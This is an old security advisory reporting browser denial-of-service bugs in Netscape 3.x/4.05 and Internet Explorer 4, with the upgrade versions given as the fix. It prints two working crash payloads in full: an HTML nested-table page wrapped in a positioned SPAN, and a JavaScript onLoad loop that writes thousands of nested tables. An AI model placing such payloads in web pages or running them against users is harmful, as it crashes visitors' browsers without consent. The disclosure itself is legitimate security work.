COMMAND

    Netscape and IE

SYSTEMS AFFECTED

    Win, Linux

PROBLEM

    Leonid Ksido discoverd a way to crash netscape browser with nested
    tables.  This  bug has been  tested on Communicator  4.05 on Linux
    Slackware 3.4, and Navigator 4.05  on Windows 98.  Both  Linux and
    Windows versions of Netscape couldn't handle the tables.  I tested
    it against Arancha DOS graphical browser and it's OK :-) It  seems
    that NS crashes with nested tables inside <span></span>.

    To see if you're vulnearble, visit:

        http://www.bway.net/~manic/N

    The testing code from that page follows:

        <HTML>
        <SPAN  STYLE="position:absolute; LEFT:0">
        <TABLE BORDER="0" WIDTH=100%>
        <TR>
        <TD>
        <TABLE>
        <TR>
        <TD>
        </TD>
        </TR>
        <TR>
        <TD>
        <TABLE>
        <TR>
        <TD>
        </TD>
        </TR>
        </TABLE>
        </TD>
        </TR>
        </TABLE>
        </TD>
        </TR>
        </TABLE>
        </SPAN>
        </HTML>

    Eric Swendsen pointed out  another another browser DoS  that works
    against  Netscape  3.x  and  Internet  Explorer  4.  It might work
    against other browsers.

        <html>
        <head>
        <title></title>
        <script>
        <!--

        function browserBonk()
        {

                for(i = 0; i < 9999; i++)
                        document.write("<table><tr><td>");
                for(i = 0; i < 9999; i++)
                        document.write("</td></tr></table>");
        }

        // -->
        </script>
        </head>
        <body onLoad="browserBonk()">
        </body>
        </html>

SOLUTION

    IE 5 and NS 4.50 should fix that.